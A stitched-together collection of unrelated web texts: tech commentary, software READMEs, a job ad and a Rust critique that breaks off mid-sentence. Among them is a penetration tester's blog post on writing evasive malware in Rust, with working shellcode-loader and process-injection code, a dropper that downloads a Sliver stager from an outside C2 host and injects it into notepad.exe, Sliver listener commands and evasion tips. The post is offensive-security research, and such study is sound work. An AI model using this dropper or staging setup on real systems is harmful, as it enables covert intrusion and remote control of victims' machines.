: Apple first, users second, developers third. The DMA attempts to invert that order, privileging developers first (in the ostensible name of fair competition with Apple, a designated “gatekeeper”), ahead of users, and ahead of Apple itself. So of course Apple is going to object to and resist mandates that require it to subordinate its own strategic desires — its own sense of how its products ought to be designed and engineered — especially when the primary beneficiary of the mandates aren’t users, but developers. Many of whom, especially the larger ones, are Apple’s competitors. But I also think it’s clear, with Apple in particular, that users prefer Apple’s priorities. People are happier with Apple putting users’ considerations ahead of developers’ than they are when developers are free to run roughshod over the software platform.
The clearest example of that is the App Store. It’s developers, not users, who object to the App Store model — the exclusivity of distribution, the exclusivity of the vendor’s payment system, the vendor’s payment commissions, the vendor’s functional guidelines and restrictions, all of it. Users don’t have a problem with any of that. That’s why Apple
commissioned and then publicized a study
, just this month, that showed that DMA-driven changes saved developers €20 million in commissions, but that reduction in commissions didn’t lower the prices users pay. Developer-focused observers
see that as a win for the DMA
— that’s €20 million in developers’ pockets that otherwise would have gone into Apple’s already overflowing pockets. But a user-focused observer might see that as clarifying regarding the fact that the DMA wasn’t designed to benefit users, and isn’t benefiting users in practice either. Apple doesn’t care about €20 million. They fart bigger than that. They do care about clarifying who the DMA prioritizes first, and that it’s not users. (And, of course, that it’s not Apple itself.)
Users love the App Store model. With Apple in particular, users, by and large,
like
the idea that the platforms have stringent guardrails. Many buy iPhones
because
Apple exerts such control over the platform, not
despite
it. But that control is exactly why Apple has been so singularly targeted by the European Commission regarding DMA mandates, despite the fact that Samsung by itself — let alone the Android platform as a whole —
sells more phones in Europe
(and
the world
) than Apple does.
The bottom line is that users setting up new Apple Watches in the EU will now get a somewhat slightly worse experience in the name of parity with accessories made by third-party companies. It remains to be seen whether users of third-party iPhone accessories and peripherals in the EU will see any benefit at all (because the companies that make their devices will need to adopt these new EU-exclusive Wi-Fi Infrastructure APIs in their iOS companion apps) — and, if the users of third-party iPhone accessories
do
see the benefit of Wi-Fi network information syncing to their devices, whether their privacy will be respected. But don’t make the mistake of thinking that Apple is complying the least bit spitefully with regard to this mandate.
libfive: a software library and set of tools for solid modeling
libfive
is a software library and set of tools for solid modeling,
especially suited for parametric and procedural design.
It is infrastructure for generative design,
mass customization,
and domain-specific CAD tools.
The geometry kernel is based on functional representations,
which have several benefits over traditional triangle meshes:
Constructive solid geometry is trivial, and scales well to large models
Resolution can be arbitrarily high (down to floating-point accuracy)
Many unusual operations (e.g. blends and warps) are robust and easy to express
The
libfive
stack includes a low-level geometry kernel,
bindings in higher-level languages, a standard library of
shapes and transforms, and a desktop application
for script-based design.
Studio is a great place to start, but it's only one example of an application
that can be built on this framework.
The layers are loosely coupled, so you can build useful tools at various
levels of abstraction.
Building your own CAD software?
Use the
libfive
kernel for solid modeling,
then add domain-specific details with your own GUI and frontend.
Need bindings in a high-level language?
Use the C bindings and your language's FFI
to build tools that integrate with the rest of your system.
How about a design customizer?
Write a headless CAD application with the Scheme bindings
and standard library, then run it as a service
to generate user-customized models.
libfive
is an open-source project licensed under the MPL
(for kernel and core libraries) and GPL (for the Studio GUI).
This means that it's a commercially friendly kernel;
indeed, it's already used in at least one commercial CAD package.
This repo contains the protocol specification, reference implementations, and tests for the negentropy set-reconciliation protocol. See
our article
for a detailed description. For the low-level wire protocol, see the
Negentropy Protocol V1
specification.
Set-reconciliation supports the replication or syncing of data-sets, either because they were created independently, or because they have drifted out of sync due to downtime, network partitions, misconfigurations, etc. In the latter case, detecting and fixing these inconsistencies is sometimes called
anti-entropy repair
.
Suppose two participants on a network each have a set of records that they have collected independently. Set-reconciliation efficiently determines which records one side has that the other side doesn't, and vice versa. After the records that are missing have been determined, this information can be used to transfer the missing data items. The actual transfer is external to the negentropy protocol.
This page is a technical description of the negentropy wire protocol and the various implementations. Read
our article
for a comprehensive introduction to range-based set reconciliation, and the
Negentropy Protocol V1
specification for the low-level wire protocol.
Protocol
Data Requirements
In order to use negentropy, you need to define some mappings from your data records:
record -> ID
Typically a cryptographic hash of the entire record
The ID must be 32 bytes in length
Different records should not have the same ID (satisfied by using a cryptographic hash)
Equivalent records should not have different IDs (records should be canonicalised prior to hashing, if necessary)
record -> timestamp
Although timestamp is the most obvious, any ordering criteria can be used. The protocol will be most efficient if records with similar timestamps are often downloaded/stored/generated together
Units can be anything (seconds, microseconds, etc) as long as they fit in an 64-bit unsigned integer
The largest 64-bit unsigned integer should be reserved as a special "infinity" value
Timestamps do
not
need to be unique (different records can have the same timestamp). If necessary,
0
can be used as the timestamp for every record
Negentropy does not support the concept of updating or changing a record while preserving its ID. This should instead be modelled as deleting the old record and inserting a new one.
Setup
The two parties engaged in the protocol are called the client and the server. The client is sometimes also called the
initiator
, because it creates and sends the first message in the protocol.
Each party should begin by sorting their records in ascending order by timestamp. If the timestamps are equivalent, records should be sorted lexically by their IDs. This sorted array and contiguous slices of it are called
ranges
.
For the purpose of this specification, we will assume that records are always stored in arrays. However, implementations may provide more advanced storage data-structures such as trees.
Bounds
Because each side potentially has a different set of records, ranges cannot be referred to by their indices in one side's sorted array. Instead, they are specified by lower and upper
bounds
. A bound is a timestamp and a variable-length ID prefix. In order to reduce the sizes of reconciliation messages, ID prefixes are as short as possible while still being able to separate records from their predecessors in the sorted array. If two adjacent records have different timestamps, then the prefix for a bound between them is empty.
Lower bounds are
inclusive
and upper bounds are
exclusive
, as is
typical in computer science
. This means that given two adjacent ranges, the upper bound of the first is equal to the lower bound of the second. In order for a range to have full coverage over the universe of possible timestamps/IDs, the lower bound would have a 0 timestamp and all-0s ID, and the upper-bound would be the specially reserved "infinity" timestamp (max u64), and the ID doesn't matter.
Alternating Messages
After both sides have setup their sorted arrays, the client creates an initial message and sends it to the server. The server will then reply with another message, and the two parties continue exchanging messages until the protocol terminates (see below). After the protocol terminates, the
client
will have determined what IDs it has (and the server needs) and which it needs (and the server has). If desired, it can then respectively upload and/or download the missing records.
Each message consists of a protocol version byte followed by an ordered sequence of ranges. Each range contains an upper bound, a mode, and a payload. The range's implied lower bound is the same as the previous range's upper bound (or 0, if it is the first range). The mode indicates what type of processing is needed for this range, and therefore how the payload should be parsed.
The modes supported are:
Skip
: No further processing is needed for this range. Payload is empty.
Fingerprint
: Payload contains a
digest
of all the IDs within this range.
IdList
: Payload contains a complete list of IDs for this range.
If a message does not end in a range with an "infinity" upper bound, an implicit range with upper bound of "infinity" and mode
Skip
is appended. This means that an empty message indicates that all ranges have been processed and the sender believes the protocol can now terminate.
Algorithm
Upon receiving a message, the recipient should loop over the message's ranges in order, while concurrently constructing a new message.
Skip
ranges are answered with
Skip
ranges, and adjacent
Skip
ranges should be coalesced into a single
Skip
range.
IdList
ranges represent a complete list of IDs held by the sender. Because the receiver obviously knows the items it has, this information is enough to fully reconcile the range. Therefore, when the client receives an
IdList
range, it should reply with a
Skip
range. However, since the goal of the protocol is to ensure the
client
has this information, when a server receives an
IdList
range it should reply with its own ranges (typically
IdList
and/or skip ranges).
Fingerprint
ranges contain a digest which can be used to determine whether or not the set of data items within the range are equal on both sides. However, if they differ, determining the actual differences requires further recursive processing.
Since
IdList
or
Skip
messages will always cause the client to terminate processing for the given ranges, these messages are considered
base cases
.
When the fingerprints on each side differ, the reciever should
split
its own range and send the results back in the next message. When splitting, the number of records within each sub-range should be considered. If small, an
IdList
range should be sent. If large, the sub-ranges should themselves be sent as
Fingerprint
s (this is the recursion).
When a range is split, the sub-ranges should completely cover the original range's lower and upper bounds.
Unlike in Meyer's designs, "empty" fingerprints are never used to indicate the absence of items within a range. Instead, an
IdList
of length 0 is sent because it is smaller.
How to split the range is implementation-defined. The simplest way is to divide the records that fall within the range into N equal-sized buckets, and emit a
Fingerprint
sub-range for each of these buckets. However, an implementation could choose different grouping criteria. For example, events with similar timestamps could be grouped into a single bucket. If the implementation believes recent events are less likely to be reconciled, it could make the most recent bucket an
IdList
instead of
Fingerprint
.
Note that if alternate grouping strategies are used, an implementation should never reply to a range with a single
Fingerprint
range, otherwise the protocol may never terminate (if the other side does the same).
The initial message should cover the full universe, and therefore must have at least one range. The last range's upper bound should have the infinity timestamp (and the
id
doesn't matter, so should be empty also). How many ranges used in the initial message depends on the implementation. The most obvious implementation is to use the same logic as described above, either using the base case or splitting, depending on set size. However, an implementation may choose to use fewer or more buckets in its initial message, and/or may use different grouping strategies.
Once the client has looped over all ranges in a server's message and its constructed response message is a full-universe
Skip
range (ie, the empty string
""
), then it needs no more information from the server and therefore it should terminate the protocol.
Fingerprints
Fingerprints are short digests (hashes) of the IDs contained within a range. A cryptographic hash function could simply be applied over the concatenation of all the IDs, however this would mean that generating fingerprints of sub-ranges would require re-hashing a potentially large number of IDs. Furthermore, adding a new record would invalidate a cached fingerprint, and require re-hashing the full list of IDs.
To improve efficiency, negentropy fingerprints are specified as an incremental hash. There are
several considerations
to take into account, but we believe the
algorithm used by negentropy
represents a reasonable compromise between security and efficiency.
Frame Size Limits
If there are too many differences and/or they are too evenly distributed throughout the range, then message sizes may become unmanageably large. This might be undesirable if the network transport has message size limitations, meaning you would have to implement some kind of fragmentation system. Furthermore, large batch sizes inhibit work pipelining, where the synchronised records can be processed in parallel with additional reconciliation.
Because of this, negentropy implementations may support a
frame size limit
parameter. If configured, all messages created by this instance will be of length equal to or smaller than this number of bytes. After processing each message, any discovered differences will be included in the
have
/
need
arrays on the client.
To implement this, instead of sending all the ranges it has found that need syncing, the instance will send a smaller number of them to stay under the size limit. Any following ranges that were sent are replied to with a single coalesced
Fingerprint
range so that they will be processed in subsequent message rounds. Frame size limits can increase the number of messaging round-trips and bandwidth consumed.
In some circumstances, already reconciled ranges can be coalesced into the final
Fingerprint
range. This means that these ranges will get re-processed in subsequent reconciliation rounds. As a result, if either of the two sync parties use frame size limits, then discovered differences may be added to the
have
/
need
multiple times. Applications that cannot handle duplicates should track the reported items to avoid processing items multiple times.
Implementations
This section lists all the currently-known negentropy implementations. If you know of a new one, please let us know by
opening an issue
.
fiatjaf added support to
fq
to inspect and debug negentropy messages (see
example usage
):
Testing
There is a conformance test-suite available in the
testing
directory.
In order to test a new language you should create a "harness", which is a basic stdio line-based adapter for your implementation. See the
test/cpp/harness.cpp
and
test/js/harness.js
files for examples. Next, edit the file
test/Utils.pm
and configure how your harness should be invoked.
Harnesses may require some setup before they are usable. For example, to use the C++ harness you must first run:
git submodule update --init
cd test/cpp/
make
In order to run the test-suite, you'll need the perl module
Session::Token
(
libsession-token-perl
Debian/Ubuntu package).
Once setup, you should be able to run something like
perl test.pl cpp,js
from the
test/
directory. This will perform the following:
For each combination of language run the following fuzz tests:
Client has all records
Server has all records
Both have all records
Client is missing some and server is missing some
The test is repeated using each language as both the client and the server.
Afterwards, a different fuzz test is run for each language in isolation, and the exact protocol output is stored for each language. These are compared to ensure they are byte-wise identical.
Finally, a protocol upgrade test is run for each language to ensure that when run as a server it correctly indicates to the client when it cannot handle a specific protocol version.
For the Rust implementation, check out its repo in the same directory as the
negentropy
repo, build the
harness
commands for both C++ and Rust, and then inside
negentropy/test/
directory running
perl test.pl cpp,rust
For the golang implementation, checkout the repo in the same directory as the
negentropy
repo, then inside
negentropy/test/
directory running
perl test.pl cpp,go
For the kotlin implementation, checkout the repo in the same directory as the
negentropy
repo, then inside
negentropy/test/
directory running
perl test.pl cpp,kotlin
Author
(C) 2023-2024 Doug Hoyte and contributors
Protocol specification, reference implementations, and tests are MIT licensed.
Liva AI (YC S25) is focused on collecting high-quality and proprietary voice and video data. We're actively hiring for a community growth intern. You’ll help us foster a community at Liva AI, with an emphasis on building large online communities.
Job responsibilities:
Grow and manage some online community like a Discord server or subreddit
Manage hundreds to thousands of people online
Communicate regularly with Liva AI team
You must:
Have grown and managed larger Discord servers, Reddit communities, or other large online communities
Have lightening fast response time
Have great flexibility in schedule consistently
No need to send resume, just send me the server/subreddit/community you made with a brief description.
About
Liva AI
Liva's mission is to make AI look and sound truly human. The AI voices and faces today feel off, and lack the capability to reflect diverse people across different ethnicities, races, accents, and career professions. We’re fixing that by building the world’s richest library of human voice and video data, fueling the next generation of realistic AI.
We will provide free autocomplete inference for existing customers for the foreseeable future.
Here’s what you need to know:
Existing users will be fully refunded today for their remaining usage.
We will provide free autocomplete inference for existing customers for the foreseeable future.
We’re sunsetting Supermaven after our acquisition
one year ago
.
After bringing features of Supermaven to Cursor Tab, we now recommend any existing VS Code users to migrate to Cursor. Our
new and improved
autocomplete model has significant improvements.
While deciding the future of Supermaven, we heard feedback from our existing Neovim and JetBrains customers about their love for Supermaven. We will continue to provide autocomplete inference free for these existing customers.
We will no longer support agent conversations, which was a newer addition to the product, infrequently used. We recommend using your frontier model of choice inside Cursor for agentic coding.
Existing customers will receive prorated refunds today for remaining time on their subscription.
A custom implementation of malloc, calloc, realloc, and free in C.
Overview
This project implements a memory allocator from scratch using
sbrk
for small allocations and
mmap
for large allocations. It includes optimizations like block splitting to reduce fragmentation and coalescing to merge adjacent free blocks. Please note that this allocator is
not thread-safe
. Concurrent calls to malloc/free/realloc will cause undefined behavior. I've also written a blog post (~20 minute read) explaining step by step the process behind writing this memory allocator project, if that's of interest, you can read it
here!
Building
Prerequisites
GCC compiler
Make
POSIX-compliant system (Linux, macOS) because we're using
sbrk()
and
mmap()
<- won't work on Windows
Quick Start
make # build everything
make tests # run tests
make bench # run benchmark
I credit
Dan Luu
for his fantastic malloc() tutorial which I greatly enjoyed reading and served as a helpful reference for this project. If you would like to take a look at his tutorial (which I highly recommend), you can find it
here
.
I'd also like to thank Joshua Zhou and Abdul Fatir for reading over and giving me great feedback on the accompanying blog post for this project.
A desktop app for isolated, parallel agentic development
mux has a custom agent loop but much of the core UX is inspired by Claude Code. You'll find familiar features like Plan/Exec mode, vim inputs,
/compact
and new ones
like
opportunistic compaction
and
mode prompts
.
mux is in a Preview state. You will encounter bugs and performance issues.
It's still possible to be highly productive. We are using it almost exclusively for our own development.
See
AGENTS.md
for development setup and guidelines.
License
Copyright (C) 2025 Coder Technologies, Inc.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, version 3 of the License.
TL;DR: This blog explores the advantages of using Rust over C for malware development, highlighting Rust's evasive characteristics and challenges for reverse engineering.
Through a hands-on example of a simple shellcode dropper, it demonstrates how Rust can better simulate modern adversarial tactics.
Introduction
One of my New Year’s resolutions for 2025 was to deepen my understanding of malware development, complementing my experience in gaining initial footholds through
web application and API penetration testing
. I was strongly motivated to enhance my own abilities, so I could better simulate real adversarial tactics. For malware development, I chose Rust as the primary programming language for its inherent anti-analysis features – allowing for the development of more evasive tooling. In this blog post, we’ll compare developing malware in Rust compared to its C counterparts and develop a simple malware dropper for demonstration.
Update
Now Featuring Podcast Interview
In addition to this in-depth exploration of Rust for malware development, Bishop Fox Security Consultant Nick Cerne recently discussed his research on the CyberWire’s Research Saturday podcast. The episode delves into the nuances of using Rust to create evasive malware tooling and the challenges it presents for reverse engineering. You can listen to the full conversation here:
Crafting malware with modern metals – Research Saturday Ep. 373
.
Rust VS. C Languages – A Comparative Analysis
At this point, you might be wondering—why Rust? What advantages does using Rust for malware development have over traditional languages like C or C++?
Reverse engineering or analyzing binaries compiled in these languages is more difficult than their C/C++ counterparts.
Malware developed in an unconventional language is much more likely to bypass signature-based detection mechanisms.
In 2023, the Rochester Institute of Technology published a
thesis
which aimed to prove or disprove these hypotheses by performing a comparative analysis of malware developed in Rust and C/C++. The results of the study are summarized by the following facts:
The size of Rust binaries is significantly larger than their C/C++ counterparts, which could increase reverse engineering efforts and complexity.
Automated malware analysis tools produced more false positives and false negatives when analyzing malware compiled in the Rust programming language.
Status quo reverse engineering tools like Ghidra and IDA Free do not do a great job of disassembling Rust binaries as opposed to C/C++.
To explore these results, we can analyze and compare functionally identical shellcode loader samples. Specifically, a sample developed in Rust and the other in C. At a high level, our malware samples will perform the following:
Read raw shellcode bytes from a file that launches
calc.exe.
Write and execute the shellcode in memory of the local process using Windows APIs.
For example, the Rust code snippet can be referenced below:
use std::fs::File;
use std::ptr;
use std::io::{self, Read};
use windows::Win32::{
System::{
Threading::{CreateThread, WaitForSingleObject, THREAD_CREATION_FLAGS, INFINITE},
Memory::{VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_PROTECTION_FLAGS},
},
Foundation::CloseHandle
};
fn main() {
/* Reading our shellcode into payload_vec */
let mut shellcode_bytes = File::open("shellcode/calc.bin").unwrap();
let mut payload_vec = Vec::new();
shellcode_bytes.read_to_end(&mut payload_vec);
unsafe {
/* Allocating memory in the local process */
let l_address = VirtualAlloc(Some(ptr::null_mut()), payload_vec.len(), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
/* Copying shellcode to allocated memory */
ptr::copy(payload_vec.as_ptr(), l_address as *mut u8, payload_vec.len());
/* Modifying memory protections */
VirtualProtect(l_address, payload_vec.len(), PAGE_EXECUTE_READWRITE, &mut PAGE_PROTECTION_FLAGS(0));
/* Creating local thread and running shellcode */
let h_thread = CreateThread(Some(ptr::null()), 0, Some(std::mem::transmute(l_address)), Some(ptr::null()), THREAD_CREATION_FLAGS(0), Some(ptr::null_mut())).unwrap();
WaitForSingleObject(h_thread, INFINITE);
CloseHandle(h_thread);
};
println!("[!] Success! Executed shellcode.");
}
The code first reads the shellcode from
shellcode/calc.bin
and stores the result in a buffer. Subsequently, the code allocates a block of memory in the local process based on the size of the buffer. The shellcode is then copied to the allocated memory. Finally, the memory region's protections are modified, and the shellcode is executed in a new thread. For the sake of brevity, the C equivalent to the above can be referenced on our
Github
.
After compiling both programs, we can immediately see that the Rust program was significantly larger:
PS > dir
...omitted for brevity...
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/18/2025 5:19 PM 73374 c_malware.exe
-a---- 2/18/2025 4:10 PM 155136 rust_malware.exe
The compiled C program had a file size of 71.7 kilobytes (KB) whereas the release build of the Rust program was nearly double the size at 151.5 KB. When using default compiler optimization settings, Rust will statically link dependencies at compile-time. This means that all of the libraries required by the program are compiled directly into the executable, including a large portion of the Rust standard and runtime libraries. In contrast, C typically makes use of dynamic linking, which leverages external libraries installed on the system. While the larger file sizes could be considered a drawback, they could also increase the level of effort and complexity in reverse engineering Rust malware.
We can also determine if Rust malware is more difficult to reverse engineer by looking at the decompiled Ghidra output for both programs. For the sake of brevity, we'll use the Ghidra output and not include IDA Free in our analysis. Now let's look at the decompiled main function of the Rust malware, comparing it to the code above.
The above decompiled output is difficult to read and comprehend. This inability of Ghidra to properly decompile the Rust program is likely due to the following:
Ghidra attempted to decompile the Rust program to pseudo-C; differences in memory management and optimization between the languages resulted in pseudo code that is difficult to understand.
rustc
performs a number of optimizations during compilation, leading to fewer clear function boundaries and highly optimized assembly (ASM) that is difficult to interpret.
The second point can be observed by comparing the ASM of the following Rust program at different compiler optimization levels:
fn add(a: i32, b: i32) -> i32 {
a + b
}
fn main() {
let x = add(3, 4);
println!("{}", x);
}
Our program simply defines a function add and calls it in our main function with two arguments. Next, we can compile the program to unoptimized and optimized ASM using the following
rustc
commands:
We can compare the optimized and unoptimized ASM using
vim -d unoptimized.s optimized.s:
Figure 1: Optimized and Unoptimized ASM Comparison
As shown in the optimized ASM on the left, the symbol definition for the add function is missing, indicating that the function could have been in-lined by
rustc
optimizations at compile-time.
It is also worth noting that, like C++, Rust performs
symbol name mangling
, with semantics specific to Rust. However, Ghidra introduced Rust symbol name de-mangling with release 11.0. Prior to version 11.0, native Rust did not support name de-mangling, which made reverse engineering even more difficult. However, significant strides have been made since then and attempts to de-mangle symbols can be seen in the decompiled output with strings such as
std::fs::impl$8::read_to_end();
which corresponds to
shellcode_bytes.read_to_end(&mut payload_vec);
in our original code.
In contrast, the decompiled C program was much more trivial to review:
The decompiled output of the C program mirrored the source much more closely than its Rust counterparts. Additionally, in Ghidra, key functions and variables were significantly easier to identify in the symbol tree of the C program.
One important operational security (OPSEC) consideration is that Rust will include absolute file paths in compiled binaries, primarily for debugging purposes. Therefore, if OPSEC is important to you, compiling in an environment that doesn't expose identifying characteristics is a good idea.
$ strings ./rust_malware.exe | grep Nick
C:\Users\Nick\.rustup\toolchains\stable-x86_64-pc-windows-msvc\lib/rustlib/src/rust\library\alloc\src\raw_vec.rs
C:\Users\Nick\.rustup\toolchains\stable-x86_64-pc-windows-msvc\lib/rustlib/src/rust\library\alloc\src\string.rs
In conclusion, Rust could make a great alternative to C/C++ when developing malware. While the 11.0 release of Ghidra marked a significant step towards decompiling and analyzing Rust binaries, reviewing the decompiled output of Rust programs remains difficult due to function inlining and other optimizations made by
rustc
during compile-time. Additionally, the larger resulting binaries could make analyzing Rust malware more time-consuming than their C counterparts. It will be interesting to see what improvements Ghidra team or the open-source community will make in the future to make static analysis of Rust malware easier.
Developing a Rust Malware Dropper
Now with some affirmation that Rust is a solid choice for malware development, let’s build a dropper to demonstrate. A dropper is a form of malware that is designed to install additional malware onto a computer. For our purposes, we will develop a dropper that performs the following:
Enumerates processes on the target for injecting our payload
Payload execution using file mapping injection technique
Stages
sliver
over
HTTPS
Please note that the following malware is not comprehensive, and several improvements could be made from an OPSEC and evasion perspective. The following code snippets are simply to illustrate how Rust can be used for malware development.
First, we will initialize our Rust project and create our first module
enumerate_processes.rs:
use windows::{
Win32::System::ProcessStatus::EnumProcesses,
Win32::Foundation::{CloseHandle, HMODULE},
Win32::System::Threading::{OpenProcess, PROCESS_QUERY_INFORMATION, PROCESS_VM_READ},
Win32::System::ProcessStatus::{GetModuleBaseNameW}
};
pub fn get_process_pids() -> Vec<u32> {
/* Starting with a reasonable buffer size to store our PIDs */
let mut pids = vec![0u32; 1024];
let mut cb = 0u32;
unsafe {
/* Loop to dynamically resize the buffer if it is too small */
loop {
if EnumProcesses(pids.as_mut_ptr(), pids.len() as u32, &mut cb).is_err() {
/* Fail silently */
return vec![];
};
/* Identify number of pids through bytes written */
let num_pids = (cb as usize) / size_of::<u32>();
/* If buffer is larger than number of pids */
if num_pids < pids.len() {
pids.truncate(num_pids);
return pids;
}
pids.resize(pids.len() * 2, 0);
}
}
}
pub fn get_process_name(pid: u32) -> String {
/* Stores the process name into a temporary buffer */
let mut name_buffer: [u16; 260] = [0; 260];
unsafe {
let hresult = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, pid);
if hresult.is_err() {
return String::from("");
};
let handle = hresult.unwrap();
let module_name_len = GetModuleBaseNameW(handle, Some(HMODULE::default()), &mut name_buffer);
CloseHandle(handle);
if module_name_len == 0 {
return String::from("");
}
/* Returns a string decoded from the temporary buffer */
return String::from_utf16_lossy(&name_buffer[..module_name_len as usize]);
}
}
The above code leverages several Windows APIs to enumerate remote processes on the target system. Specifically, the following APIs were used:
EnumProcesses
- Retrieves the process identifiers (PID) for each process in the system and stores the results in an array.
OpenProcess
- Opens a handle to an existing local process object using a specified PID.
GetModuleBaseNameW
- Retrieves the process name using the open handle to the process.
We can quickly create a unit test in the same file to validate that the above code is working as expected.
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_enumerate_processes() {
let pids = get_process_pids();
let has_svchost = pids.iter().any(|&pid| {
match get_process_name(pid) {
name => name == "svchost.exe",
_ => false
}
});
assert!(has_svchost, "No svchost.exe process found");
}
}
After running
cargo test
, we get the following output which indicates the code successfully identified the
svchost.exe
process.
PS > cargo test
...omitted for brevity...
running 1 test
test enumerate_processes::tests::test_enumerate_processes ... ok
test result: ok. 1 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out; finished in 0.00s
Now that we've created a means to enumerate the remote processes on the system, we should write the code responsible for injecting our payload into a specified process. Before injecting shellcode into a process, a private memory block corresponding to the length of the payload must first be allocated in the target process. To achieve this, attackers commonly make use of the
VirtualAlloc
and
VirtualAllocEx
Windows APIs, which allocate memory directly in the specified process. Therefore, the process of allocating private memory using this method is highly monitored by security solutions. Alternatively, we can use a technique called Remote Mapping Injection which is capable of allocating memory using lesser-known Windows APIs:
CreateFileMapping
- Creates a file mapping object which will contain the length of our payload.
MapViewOfFile
- Maps a view of the file mapping object into the local address space.
MapViewOfFileNuma2
- Maps a view of the file mapping object into a remote process's address space, which includes our payload.
It's important to note that before calling
MapViewOfFileNuma2
, the payload must first be copied into the local address space created when calling
MapViewOfFile
. Once the payload is copied to the remote process, we'll utilize the
CreateRemoteThread
API to execute it.
CreateRemoteThread
is another highly monitored Windows API, but we'll use it for the sake of brevity and to avoid adding further complexity to our example.
For testing purposes, we'll simply attempt to inject
calc.exe
shellcode into the memory of the
notepad.exe
process.
After running our unit test, we can see that
calc.exe
was successfully injected and executed in memory of
notepad.exe.
Figure 2: Calc.exe Successfully Injected and Executed in Memory of notepad.exe
Additionally, we can view our payload in the memory regions of
notepad.exe
immediately after the payload is copied to the remote process using
x64dbg.exe
:
Figure 3: Payload in Memory Regions of Notepad.exe
As demonstrated, our payload was successfully copied to the
0x20efa400000
memory address of
notepad.exe
and our payload was executed.
Now we should first set up our
sliver
C2 environment (
get sliver here
). For simplicity, we'll just be interacting directly with our C2 server since we don't need to worry about hiding it in our testing environment. We can set up an HTTPS stage listener using the following commands:
sliver > profiles new --http sliver.nrcerne.com --format shellcode sliver-https
[*] Saved new implant profile sliver-https
sliver > stage-listener --url https://sliver.nrcerne.com:8886 --profile sliver-https --prepend-size
[*] No builds found for profile sliver-https, generating a new one
[*] Sliver name for profile sliver-https: PROFITABLE_ALUMINIUM
[*] Job 1 (https) started
Next, we should set up an HTTPS listener:
sliver > https
[*] Successfully started job #10
Finally, we need to generate our stager and serve it from our C2 infrastructure.
generate stager --protocol https --lhost sliver.nrcerne.com --lport 8886 -f raw
--save /tmp
[*] Sliver implant stager saved to: /tmp/DULL_EQUIPMENT
Now we can modify
main.rs
to download and execute our sliver stager in the context of
notepad.exe
. Note that a simple HTTPS client was developed using the
reqwest
library to retrieve our shellcode.
mod enumerate_processes;
mod remote_mapping_injection;
mod http_client;
fn main() {
let url = String::from("https://sliver.nrcerne.com:8444/DULL_EQUIPMENT");
let shellcode = http_client::get_payload_bytes(url).unwrap();
let pids = enumerate_processes::get_process_pids();
let mut p_name: String;
for p in pids {
p_name = enumerate_processes::get_process_name(p);
if p_name == "notepad.exe" {
remote_mapping_injection::inject(p, &shellcode);
}
}
}
After running the executable, we observe the following connect back to our sliver server indicating that our stager was successfully executed in memory of
notepad.exe
.
[*] Session 7f947e00 PROFITABLE_ALUMINIUM - 3.81.150.232:49807 (EC2AMAZ-999SMRM) - windows/amd64 - Tue, 25 Feb 2025 00:44:18 UTC
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ================= =============== ================== =========
7f947e00 http(s) 3.81.150.232:49807 EC2AMAZ-999SMRM Administrator windows/amd64 [ALIVE]
sliver > use 7f947e00
[*] Active session PROFITABLE_ALUMINIUM (7f947e00-3b9a-4ef0-ad83-06a31a44c9f9)
sliver (PROFITABLE_ALUMINIUM) > whoami
Logon ID: EC2AMAZ-999SMRM\Administrator
As demonstrated, Rust could make a great alternative for malware development and can easily be used to stage
sliver
or perform other malicious actions. As aforementioned, several improvements could be made to the above example from an OPSEC and evasion standpoint, but a simple dropper was sufficient for our demonstration.
As you are probably already aware, malware development is a constantly evolving game of cat and mouse, requiring constant refinement and development of new techniques to remain effective as security solutions evolve in tandem. Although the process has been challenging so far in 2025, it has also been very rewarding, providing me with valuable insights into Windows internals and modern evasion techniques. Additionally, learning a cool new systems level language was a great byproduct for pursuing other low-level projects!
Iowa City Made Its Buses Free. Traffic Cleared, and So Did the Air
I used to call myself a Rust hater, but really I was doing it just to compensate for the perceivable fanboyism e.g. Rust tops on stackoverflow surveys as most-loved language. There are many reasons to hate C++, and I hate C++ too. Lots of people were waiting for a better programming language, but got Rust instead.
There are several core problems with Rust:
Its compilation is slow. I mean SLOW. Slower than C++.
I know over years Rust became several times faster, but objectively we need it to be two orders of magnitude faster, not just two times.
It’s complex. Just as complex as C++. But C++ had legacy and Rust had not. The complexity of forcing your way through the jungle of
Arc<Mutex<Box<T>>>
on every single step directly impacts the quality of the logic being implemented i.e. you can’t see the forest for the trees. Once again, C++ has the same problem, so what’s the point of the language switch in the end?
Memory safety is not that sacred. In fact, for many applications malfunctioning is better than crashing — particulary in the embedded world where Rust wants to be present. You cannot get 99.999% reliability with Rust — it crashes all the time.
When handling lots of mutable shared state (GUI, DB, stateful services, OS/hardware), the performance of native Rust memory model is subpar, and non-native unsafes just leave you with slow compilation, high complexity, and no memory safety in the end — which makes Rust practically meaningless for heavy mutable state jobs.
C++ actually sucks
There is no doubt about it. Undefined behavior (UB) is a fundamental aspec of the language, you don’t simply encounter UB — the whole language is built on UB. You do array indexing and you immediately encounter UB because the language just does not check out of bound access. I want to emphasize that lots of UB-s are not even justified by performance matters — it’s an outright sloppy design of C carried over and amplified in C++. I can go all day long about how C++ sucks:
implicit type conversions, implicit copies, implicit constructors, implicit object slicing, and pretty much everything implicit;
function overloading (implicit), particulary considering its omnipresence in STL;
non-uniform error handling with exceptions as afterthought;
still #include-ing text files 40 years after C and One Definition Rule barely checked by compilers;
unsound combination of paradigms (good luck overriding a generic function in descendant classes);
SFINAE nuisance as a core mechanism of generic programming;
T, T&, T*, std::optional
, std::unique_ptr
to describe similar things, each broken in its own way. Put a const cherry on top of it.
So C++ is complex, unsafe, and it’s compiler is slow. How does the Rust (not) fix those issues?
Rust FAQ
explains that there are many efforts to optimize it, like better frontend, MIR, and so on. But MIR effort was started at 2015 and it still fails to significantly quicken the compilation (although it speeds up compiler checks).
Unfortunately, it’s impossible to make Rust compile fast. The problem is inherent to all similar generics-heavy languages, like Haskell. Arguably, Rust is closer to Haskell than it is to C++. You can also say it’s close to a template-heavy C++ — and template-heavy C++ code exhibits the same problem of slow compilation.
When you do
for i in 0..limit {}
